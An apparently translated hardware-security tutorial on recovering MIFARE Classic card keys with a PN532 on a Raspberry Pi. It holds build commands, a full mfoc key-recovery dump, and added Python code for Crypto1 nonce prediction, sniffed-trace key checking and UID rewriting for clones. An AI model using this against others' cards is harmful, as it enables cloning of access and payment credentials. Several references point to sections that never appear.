Introduction
Hardware security is something most newcomers rarely get to touch, and it is an area I find very attractive, but the price of some professional research gear puts people off. In this series I want readers who are interested to get a taste of what hardware security has to offer without spending much money. The series is planned in four parts: BadUSB on Arduino; RFID on PN532; GSM on Motorola C118; SDR on RTL2832U (the DVB-T dongle).
Background
As early as 2007, researchers broke the Mifare Classic ("M1") card. NXP used an undisclosed cipher (Crypto1) on the M1, and the history of cryptography has shown time and again that "undisclosed" has nothing to do with "secure": the researchers dissected the chip's gate layout, reverse engineered the cipher from it and found it weak. The M1 layout is shown in the figure (not reproduced here): a 1K card has 16 sectors of 4 blocks of 16 bytes each. Block 0 is the manufacturer block holding the UID, and the last block of every sector is the sector trailer, which stores key A, the access bits and key B. (The mfoc dump further down shows exactly this: blocks 3, 7, 11 ... 63 carry the trailer pattern ff 07 80 69 in the middle.)
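The layout just described, as an added example (my own code, not from the article): the absolute-block-to-sector mapping for 1K and 4K cards, and a decoder for the three access bytes of a sector trailer, including the inverted-nibble redundancy check the card itself enforces. The rule tables are the ones from NXP's MF1S50/MF1S70 datasheets; the sample trailer is the transport configuration ff 07 80 69 that the mfoc dump further down shows on every sector. The trailer table is also what tells you which key nfc-mfclassic has to authenticate with for a write, a question the writing section at the end raises.

```python
"""MIFARE Classic block/sector layout and sector-trailer access conditions (added example)."""

SMALL_SECTORS = 32                  # sectors 0-31 have 4 blocks (all of a 1K card, first half of a 4K)
BLOCKS_SMALL, BLOCKS_LARGE = 4, 16  # sectors 32-39 of a 4K card have 16 blocks each


def sector_of_block(block):
    """Absolute block number -> sector (1K: blocks 0-63, 4K: blocks 0-255)."""
    first_large = SMALL_SECTORS * BLOCKS_SMALL          # block 128
    if block < first_large:
        return block // BLOCKS_SMALL
    return SMALL_SECTORS + (block - first_large) // BLOCKS_LARGE


def trailer_of_sector(sector):
    """Absolute block number of the sector trailer: the LAST block of the sector."""
    if sector < SMALL_SECTORS:
        return sector * BLOCKS_SMALL + (BLOCKS_SMALL - 1)
    return SMALL_SECTORS * BLOCKS_SMALL + (sector - SMALL_SECTORS + 1) * BLOCKS_LARGE - 1


def parse_trailer(trailer):
    """16-byte trailer -> (key A, access bytes 6..9, key B). Key A always reads back as zeros."""
    if len(trailer) != 16:
        raise ValueError("a block is 16 bytes")
    return trailer[0:6], trailer[6:10], trailer[10:16]


def decode_access_bits(acc):
    """Bytes 6..8 -> [(C1, C2, C3)] for access groups 0..3 (group 3 is the trailer).
    Each Cx nibble is stored twice, once inverted; the card rejects a trailer that
    fails this check, so a botched write here locks you out of the sector."""
    b6, b7, b8 = acc[0], acc[1], acc[2]
    c1, c2, c3 = (b7 >> 4) & 0xF, b8 & 0xF, (b8 >> 4) & 0xF
    nc1, nc2, nc3 = b6 & 0xF, (b6 >> 4) & 0xF, b7 & 0xF
    if (c1 ^ nc1, c2 ^ nc2, c3 ^ nc3) != (0xF, 0xF, 0xF):
        raise ValueError("access bits fail the inverted-nibble check: " + acc.hex())
    return [((c1 >> g) & 1, (c2 >> g) & 1, (c3 >> g) & 1) for g in range(4)]


# (C1, C2, C3) -> (read, write) for a data block; "AB" = key A or key B, "-" = never.
# Value-block increment/decrement rules are omitted.
DATA_RULES = {
    (0, 0, 0): ("AB", "AB"), (0, 1, 0): ("AB", "-"), (1, 0, 0): ("AB", "B"), (1, 1, 0): ("AB", "B"),
    (0, 0, 1): ("AB", "-"),  (0, 1, 1): ("B", "B"),  (1, 0, 1): ("B", "-"),  (1, 1, 1): ("-", "-"),
}
# (C1, C2, C3) -> (keyA read, keyA write, acc read, acc write, keyB read, keyB write)
TRAILER_RULES = {
    (0, 0, 0): ("-", "A", "A", "-", "A", "A"),
    (0, 1, 0): ("-", "-", "A", "-", "A", "-"),
    (1, 0, 0): ("-", "B", "AB", "-", "-", "B"),
    (1, 1, 0): ("-", "-", "AB", "-", "-", "-"),
    (0, 0, 1): ("-", "A", "A", "A", "A", "A"),     # transport configuration (ff 07 80)
    (0, 1, 1): ("-", "B", "AB", "B", "-", "B"),
    (1, 0, 1): ("-", "-", "AB", "B", "-", "-"),
    (1, 1, 1): ("-", "-", "AB", "-", "-", "-"),
}


def explain_trailer(trailer):
    """Access summary of a 4-block sector from its trailer."""
    key_a, acc, key_b = parse_trailer(trailer)
    groups = decode_access_bits(acc)
    ka_r, ka_w, acc_r, acc_w, kb_r, kb_w = TRAILER_RULES[groups[3]]
    return {
        "data_blocks": {g: DATA_RULES[groups[g]] for g in range(3)},   # offset -> (read, write)
        "key_a_write": ka_w, "acc_write": acc_w,
        "key_b_readable_with": kb_r, "key_b_write": kb_w,
        "key_b_in_dump": key_b.hex() if kb_r != "-" else None,  # zeros in a dump mean "not readable"
    }


if __name__ == "__main__":
    t = bytes.fromhex("000000000000ff078069ffffffffffff")   # trailer as seen in the mfoc dump
    print(sector_of_block(63), trailer_of_sector(39), explain_trailer(t))
```

In the transport configuration the trailer group is (0,0,1): key A is never readable, but key B is readable with key A, which is why a dump made with key A shows key B in clear, and either key may write the data blocks.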
There are currently three main ways to attack Mifare Classic cards:
Nested attack
Simply put: start from one known key, which in practice is usually a factory default key, and use it to recover all the others.
An M1 card has 16 sectors and most deployments do not use all of them, so trying the vendors' default keys will very often open at least one sector.
The weakness it then leans on is the tag's random number generator: every time the passive card is powered up by the field, the nonce it uses in the key exchange is "regular" (it comes from a 16-bit LFSR, so only 65,536 values exist and the next one is predictable from timing). Authenticate to the sector whose key you know, then authenticate to another sector from inside that session: the nonce for the second authentication is sent encrypted, but because it is predictable you learn keystream, and from that the second sector's key is "teased out". Repeat for every sector.
Darkside attack
Simply put, key recovery without any known key: recover one sector's key this way, then use the Nested attack to dump the whole card.
It is not a plain brute force. The card's authentication leaks information: when the reader sends a malformed authentication whose eight parity bits happen to be correct, the card replies with an encrypted 4-bit NACK, and those answers leak keystream bits. That shrinks the 2^48 key space to something searchable in minutes to hours, which is why this is the fallback when no default key works.
Sniffing
As the name says: capture the exchange between a genuine card and its reader during a normal transaction, then recover the key offline. One complete authentication (UID, tag nonce, encrypted reader nonce, reader response, tag response) is enough to compute the key.
For reference, the Black Hat 2014 slides:
and the related paper (de Koning Gans, Hoepman and Garcia, "A Practical Attack on the MIFARE Classic"):
http://www.cs.ru.nl/~flaviog/publications/Attack.MIFARE.pdf
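To make the Nested and sniffing attacks above concrete, here is an added example (my own Python port of the Crypto1 cipher and tag PRNG as published by the crapto1 project; it is not code from this article or from mfoc/mfcuk). It shows two things: that the tag nonce comes from a 16-bit LFSR, so the "distance" in clocks between two nonces (the number mfoc prints per probe further down) is all you need to predict the next one; and how a sniffed authentication is checked against a candidate key, which is what mfcuk's -P option and mfkey-style tools do. The trace values in the demo are the ones mfcuk's own usage text quotes as an example later on this page (uid, tag challenge, encrypted reader nonce, reader response, tag response), which that text says correspond to key FFFFFFFFFFFF; everything else (the simulated reader nonce, the PRNG state) is made up.

```python
"""Crypto1 and the MIFARE Classic tag PRNG, ported from the published crapto1
description (added example, my own code). Shows why tag nonces are predictable
(the Nested attack's lever) and checks a sniffed authentication against a key."""

LF_POLY_ODD, LF_POLY_EVEN = 0x29CE5C, 0x870804   # 48-bit LFSR taps, split into odd/even halves


def _bit(x, n):
    return (x >> n) & 1


def _parity(x):
    return bin(x).count("1") & 1


def _filter(odd):
    """Crypto1 output function: five 4-input f_a/f_b layers feeding the 5-input f_c."""
    f = (0xF22C0 >> (odd & 0xF)) & 16
    f |= (0x6C9C0 >> ((odd >> 4) & 0xF)) & 8
    f |= (0x3C8B0 >> ((odd >> 8) & 0xF)) & 4
    f |= (0x1E458 >> ((odd >> 12) & 0xF)) & 2
    f |= (0x0D938 >> ((odd >> 16) & 0xF)) & 1
    return _bit(0xEC57E80A, f)


class Crypto1:
    def __init__(self, key48):
        self.odd = self.even = 0
        for i in range(47, 0, -2):                 # load the 48-bit key, alternating halves
            self.odd = (self.odd << 1) | _bit(key48, (i - 1) ^ 7)
            self.even = (self.even << 1) | _bit(key48, i ^ 7)

    def bit(self, inp, encrypted):
        """One clock: returns a keystream bit; `inp` is fed into the LFSR,
        decrypted with that bit first when `encrypted` is 1."""
        ks = _filter(self.odd)
        fb = (ks & encrypted) ^ inp
        fb ^= _parity(LF_POLY_ODD & self.odd) ^ _parity(LF_POLY_EVEN & self.even)
        self.even = ((self.even << 1) | fb) & 0xFFFFFF
        self.odd, self.even = self.even, self.odd  # the halves swap roles every clock
        return ks

    def word(self, inp, encrypted):
        """32 clocks in over-the-air order: most significant byte first, LSB of each byte first."""
        out = 0
        for i in range(32):
            out |= self.bit(_bit(inp, i ^ 24), encrypted) << (i ^ 24)
        return out


def _swap32(x):
    return int.from_bytes(x.to_bytes(4, "big"), "little")


def prng_successor(nonce, n):
    """Advance a 32-bit tag nonce by n clocks of the 16-bit LFSR x^16+x^14+x^13+x^11+1."""
    x = _swap32(nonce)
    for _ in range(n):
        fb = ((x >> 16) ^ (x >> 18) ^ (x >> 19) ^ (x >> 21)) & 1
        x = (x >> 1) | (fb << 31)
    return _swap32(x)


def _lfsr16(s):
    return (s >> 1) | (((s ^ (s >> 2) ^ (s >> 3) ^ (s >> 5)) & 1) << 15)


_DIST = {}   # LFSR state -> position on its single 65535-long cycle, built on first use


def nonce_distance(frm, to):
    """Clocks between two nonces (mfoc's per-probe 'distance'). Only 2^16 nonces
    exist, so one observed nonce plus a stable distance pins down the next."""
    if not _DIST:
        s = 1
        for i in range(1, 65536):
            _DIST[((s & 0xFF) << 8) | (s >> 8)] = i
            s = _lfsr16(s)
    return (65535 + _DIST[to >> 16] - _DIST[frm >> 16]) % 65535


def nonce_from_state(state16):
    """The nonce a tag emits from a given 16-bit PRNG state (crapto1's byte layout)."""
    reg = state16
    for _ in range(16):
        reg = _lfsr16(reg)
    return _swap32((reg << 16) | state16)


def simulate_auth(key48, uid, nt, nr):
    """Both ends of a MIFARE Classic authentication; returns ({nR}, {aR}, {aT})."""
    reader, tag = Crypto1(key48), Crypto1(key48)
    reader.word(uid ^ nt, 0)                                 # tag nonce nT travels in clear
    nr_enc = reader.word(nr, 0) ^ nr                         # reader sends {nR}
    ar_enc = reader.word(0, 0) ^ prng_successor(nt, 64)      # ... and {aR} = suc64(nT)
    tag.word(uid ^ nt, 0)
    tag.word(nr_enc, 1)                                      # tag decrypts nR as it feeds it
    tag.word(0, 0)                                           # keystream that masked {aR}
    at_enc = tag.word(0, 0) ^ prng_successor(nt, 96)         # tag answers {aT} = suc96(nT)
    return nr_enc, ar_enc, at_enc


def key_explains_trace(key48, uid, nt, nr_enc, ar_enc, at_enc):
    """True if key48 reproduces a sniffed (uid, nT, {nR}, {aR}, {aT}) exchange."""
    cs = Crypto1(key48)
    cs.word(uid ^ nt, 0)
    cs.word(nr_enc, 1)
    ks2, ks3 = cs.word(0, 0), cs.word(0, 0)
    return ar_enc ^ ks2 == prng_successor(nt, 64) and at_enc ^ ks3 == prng_successor(nt, 96)


if __name__ == "__main__":
    trace = (0x5C72325E, 0x50829CD6, 0xB8671F76, 0xE00EEFC9, 0x4888964F)  # mfcuk -P example
    print("ffffffffffff explains trace:", key_explains_trace(0xFFFFFFFFFFFF, *trace))
    n = nonce_from_state(0x1234)                                             # made-up state
    print("distance:", nonce_distance(n, prng_successor(n, 12851)))
```

The mfoc run further down prints distances of 12845 to 12851 between consecutive nonces; that spread of a few clocks is the whole reason the -T tolerance defaults to 20 and the attack works at all. Recovering the key from a trace rather than merely checking one needs crapto1's LFSR rollback and state recovery, which this example leaves to the tools.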
Common hardware
Unlike the BadUSB part, there is not much to choose from here.
The flagship all-in-one: Proxmark3
Open-source hardware from abroad, driven by an FPGA. Very capable: sniffing, reading and cloning in one device, and it handles high-frequency and low-frequency cards alike. Runs from a PC's USB port or a separate supply. The price is correspondingly painful, although a V2 board recently showed up on Taobao for a little over 400 yuan (how they get it that low is anyone's guess: the V1 abroad is 300-odd as well, only in US dollars).
Stealth: ★★
Ease of use: ★★★★
Community support: ★★★★
Project page
A recent arrival from abroad: ChameleonMini
Had I not gone digging for material to write this article I would never have known this thing existed. It is a German crowdfunded project, roughly comparable to the PM3, with the ability to emulate a card; it is about as thick as a real card, and abroad it is priced far more kindly than the PM3.
Stealth: ★★★★
Ease of use: ★★★
Community support: ★★★
Project page
https://github.com/emsec/ChameleonMini/wiki
The most popular reader: ACR122
It is simply popular, probably because of the very capable GUI read/modify/clone tools for it that circulate on the net. A hundred-odd yuan on Taobao, still three or four times the hardware used here.
Stealth: ★
Ease of use: ★★★★
Community support: ★★
PN532
Going by the previous part's experience, none of the gear above is going to be used, because I am broke. This board costs 30 to 50 yuan on Taobao.
The star of this part is the PN532, which I connect to a Raspberry Pi. No Pi is fine too (just buy one), or use a UART-to-USB adapter and connect it to a PC. The rest of the article walks through the setup, starting from building the Pi.
System setup
Using a Windows host as the example; Linux users can adapt.
Preparing the system
Download the latest Raspbian Jessie from https://www.raspberrypi.org/ (the release I downloaded is dated 2017-02-16).
Write the unpacked .img to the SD card with Win32DiskImager.
Note that recent Raspbian releases ship with SSH disabled, so create an empty file named ssh (lowercase!!!!) in the boot partition to enable it.
SSH in with user pi, password raspberry, and change that password first thing: a Pi sitting on the network with the default credentials is a liability.
System configuration
Run sudo raspi-config.
Choose 5 Interface Options: enable SPI and I2C, and disable Serial. What you want is the serial login console off but the UART hardware on: afterwards /boot/cmdline.txt must no longer contain console=serial0,115200, and /boot/config.txt should contain enable_uart=1 (some raspi-config versions write enable_uart=0 when you answer No, which leaves the PN532 deaf).
Choose 7 Advanced Options, 1 Expand Filesystem to grow the partition.
Installing dependencies
Dependencies:
autoconf
libusb-dev
libtool
libpcsclite-dev
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install autoconf libusb-dev libtool libpcsclite-dev
Tool installation
Partly based on: https://firefart.at/post/how-to-crack-mifare-classic-cards/
Wiring the Raspberry Pi to the PN532
I used a Raspberry Pi 3, but the GPIO header is the same on other models. Put the PN532 board into HSU (UART) mode with its interface-select switches and wire it to the 40-pin header as follows (physical pin numbers; note that TX and RX cross over):
pin 04 (5V) <-> VCC
pin 06 (GND) <-> GND
pin 08 (GPIO14, TXD) <-> RXD
pin 10 (GPIO15, RXD) <-> TXD
Check the board's datasheet before feeding it 5V on VCC: the Pi's GPIO pins are 3.3V and not 5V tolerant, so the board's UART side has to be 3.3V logic.
libnfc
As the name says, the NFC library.
Official GitHub: https://github.com/nfc-tools/libnfc
wget https://github.com/nfc-tools/libnfc/releases/download/libnfc-1.7.1/libnfc-1.7.1.tar.bz2
tar -jxvf libnfc-1.7.1.tar.bz2
cd libnfc-1.7.1
autoreconf -vis
./configure --with-drivers=all --sysconfdir=/etc --prefix=/usr
make
sudo make install
sudo mkdir /etc/nfc
sudo mkdir /etc/nfc/devices.d
Because the PN532 hangs directly off the Pi's UART, libnfc also needs a device configuration:
sudo cp contrib/libnfc/pn532_uart_on_rpi.conf.sample /etc/nfc/devices.d/pn532_uart_on_rpi.conf
The sample points at /dev/ttyAMA0. On a Raspberry Pi 3 that UART is taken by the Bluetooth module and the header pins are served by the mini-UART, /dev/ttyS0 (also reachable as /dev/serial0); if nfc-list finds no device, change the connstring in that file accordingly, or move Bluetooth onto the mini-UART with dtoverlay=pi3-miniuart-bt in /boot/config.txt.
Now run nfc-list once without and once with a card on the antenna. The first run should list the PN532; the second additionally prints the card's ATQA, UID and SAK (the screenshots of the original are not reproduced here).
mfoc
mfoc is the implementation of the Nested attack described above.
Official GitHub: https://github.com/nfc-tools/mfoc
git clone https://github.com/nfc-tools/mfoc.git
cd mfoc/
autoreconf -vis
./configure
make
sudo make install
mfoc usage:
Usage: mfoc [-h] [-k key] [-f file] … [-P probnum] [-T tolerance] [-O output]
  h     print this help and exit
  k     try the specified key in addition to the default keys
        // add one key
  f     parses a file of keys to add in addition to the default keys
        // add several keys from a file
  P     number of probes per sector, instead of default of 20
        // nested-authentication probes per sector
  T     nonce tolerance half-range, instead of default of 20
        (i.e., 40 for the total range, in both directions)
        // how far the nonce distance may drift from the measured one
  O     file in which the card contents will be written (REQUIRED)
        // output dump file
  D     file in which partial card info will be written in case PRNG is not vulnerable
Example: mfoc -O mycard.mfd
Example: mfoc -k ffffeeeedddd -O mycard.mfd
Example: mfoc -f keys.txt -O mycard.mfd
Example: mfoc -P 50 -T 30 -O mycard.mfd
This is mfoc version 0.10.7.
For more information, run: 'man mfoc'.
[mfoc -h]
Simply running mfoc -O out.mfd dumps the card that is on the antenna:
mfoc -O out.mfd
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID size: single
bit frame anticollision supported
UID (NFCID1): 10 bc 79 ce
SAK (SEL_RES): 08
Not compliant with ISO/IEC 14443-4
Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
MIFARE Classic 1K
MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys…
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [.xxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [.xxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [.xxxxxxxxxxxxxxx]
[Key: 000000000000] -> [.xxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [.xxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [.xxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [.xxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [.xxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [.xxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [.xxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [.xxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [.xxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [.xxxxxxxxxxxxxxx]
Sector 00 - Unknown Key A Unknown Key B
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 05 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 06 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 07 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 08 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 09 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 10 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 11 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 12 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 13 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 14 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Using sector 01 as an exploit sector
Sector: 0, type A, probe 0, distance 12851 …..
Sector: 0, type A, probe 1, distance 12845 …..
Sector: 0, type A, probe 2, distance 12847 …..
Sector: 0, type A, probe 3, distance 12851 …..
Sector: 0, type A, probe 4, distance 12849 …..
Found Key: A [11dc95b2bd87]
Data read with Key A revealed Key B: [11dc95b2bd87] - checking Auth: OK
Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 58, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 55, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 54, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 53, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 52, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 51, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 50, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 49, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 48, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 47, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 46, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 45, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 44, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 43, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 42, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 41, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 40, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 39, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 38, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 37, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 36, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 35, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 34, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 33, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 32, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 31, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 30, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 29, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 28, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 27, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 26, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 25, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 24, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 23, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 22, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 21, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 20, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 19, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 18, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 17, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 16, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 15, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 14, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 13, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 12, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 11, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 10, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key 11dc95b2bd87 :00 00 00 00 00 00 ff 07 80 69 11 dc 95 b2 bd 87
Block 02, type A, key 11dc95b2bd87 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key 11dc95b2bd87 :5e dc bf dd 4b fd cf ff 87 d4 00 00 00 00 00 00
Block 00, type A, key 11dc95b2bd87 :10 bc 79 ce 1b 08 04 00 62 63 64 65 66 67 68 69
[mfoc -O out.mfd]
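What to do with that output, as an added example (my own code, not mfoc's): parse the Block lines into a 1K image in the raw .mfd layout nfc-mfclassic consumes, check the manufacturer block's BCC (byte 4 must be the XOR of the four UID bytes, which it is for 10 bc 79 ce above), collect the sector keys, and, for the unlocked-write case described in the writing section later, rewrite the UID with a recomputed BCC. The sample text is a constructed subset of the lines above; the .mfd assembly mirrors what mfoc does when it writes its output file (the key it authenticated with goes into the trailer's key A slot, which the card never reads back), but is my own.

```python
"""Turn mfoc's console output into a raw .mfd image and sanity-check it (added example)."""
import re

# Constructed sample: a subset of the "Block NN ..." lines printed by the mfoc run above.
SAMPLE = """\
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key 11dc95b2bd87 :00 00 00 00 00 00 ff 07 80 69 11 dc 95 b2 bd 87
Block 02, type A, key 11dc95b2bd87 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key 11dc95b2bd87 :5e dc bf dd 4b fd cf ff 87 d4 00 00 00 00 00 00
Block 00, type A, key 11dc95b2bd87 :10 bc 79 ce 1b 08 04 00 62 63 64 65 66 67 68 69
"""

BLOCK_LINE = re.compile(
    r"^Block (\d+), type ([AB]), key ([0-9a-fA-F]{12}) :((?:[0-9a-fA-F]{2} ?){16})$")
BLOCK = 16          # bytes per block
BLOCKS_1K = 64      # 1K card; pass n_blocks=256 for a 4K dump


def parse_mfoc_output(text):
    """-> ({block: 16 bytes}, {block: (key type used, 6-byte key)})."""
    blocks, auth = {}, {}
    for line in text.splitlines():
        m = BLOCK_LINE.match(line.strip())
        if m:
            n = int(m.group(1))
            blocks[n] = bytes.fromhex(m.group(4).replace(" ", ""))
            auth[n] = (m.group(2), bytes.fromhex(m.group(3)))
    return blocks, auth


def bcc(uid):
    """ISO 14443-3 check byte: XOR of the four UID bytes."""
    out = 0
    for b in uid:
        out ^= b
    return out


def manufacturer_block(block0):
    """Decode block 0: UID, BCC, SAK, ATQA (stored low byte first), then vendor data."""
    uid = block0[0:4]
    return {"uid": uid.hex(), "bcc_ok": bcc(uid) == block0[4],
            "sak": block0[5], "atqa": int.from_bytes(block0[6:8], "little")}


def sector_keys(blocks, auth, sectors=16):
    """Per sector (1K layout: trailer = every 4th block) -> (key A, key B).
    Key A is the key mfoc authenticated with; key B comes from trailer bytes
    10..15, which the transport ACL lets key A read (mfoc's 'revealed Key B')."""
    keys = {}
    for sector in range(sectors):
        trailer = sector * 4 + 3
        if trailer not in blocks:
            continue
        ktype, key = auth[trailer]
        key_b = blocks[trailer][10:16]
        keys[sector] = (key if ktype == "A" else None,
                        key_b if key_b != bytes(6) else None)
    return keys


def build_mfd(blocks, auth, n_blocks=BLOCKS_1K):
    """Raw image, blocks in order, unknown blocks zero-filled. The key used for a
    type-A authentication is written into the trailer's key A slot so the image
    can be fed straight back to nfc-mfclassic w."""
    img = bytearray(BLOCK * n_blocks)
    for n, data in blocks.items():
        chunk = bytearray(data)
        if n % 4 == 3 and auth[n][0] == "A":
            chunk[0:6] = auth[n][1]
        img[n * BLOCK:(n + 1) * BLOCK] = chunk
    return bytes(img)


def set_uid(img, new_uid):
    """For UID-changeable ('magic') clones: new 4-byte UID plus a matching BCC,
    everything else in block 0 untouched. 0x88 is the cascade tag, not a valid UID0."""
    if len(new_uid) != 4 or new_uid[0] == 0x88:
        raise ValueError("UID must be 4 bytes and must not start with 0x88")
    out = bytearray(img)
    out[0:4] = new_uid
    out[4] = bcc(new_uid)
    return bytes(out)


if __name__ == "__main__":
    blocks, auth = parse_mfoc_output(SAMPLE)
    print(manufacturer_block(blocks[0]), sector_keys(blocks, auth))
    print(len(build_mfd(blocks, auth)), "bytes of image")
```

The real out.mfd written by mfoc already has this layout (64 blocks of 16 bytes, 1024 bytes in total, keys filled in); the parser is for the case where all you kept is the console log.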
mfcuk
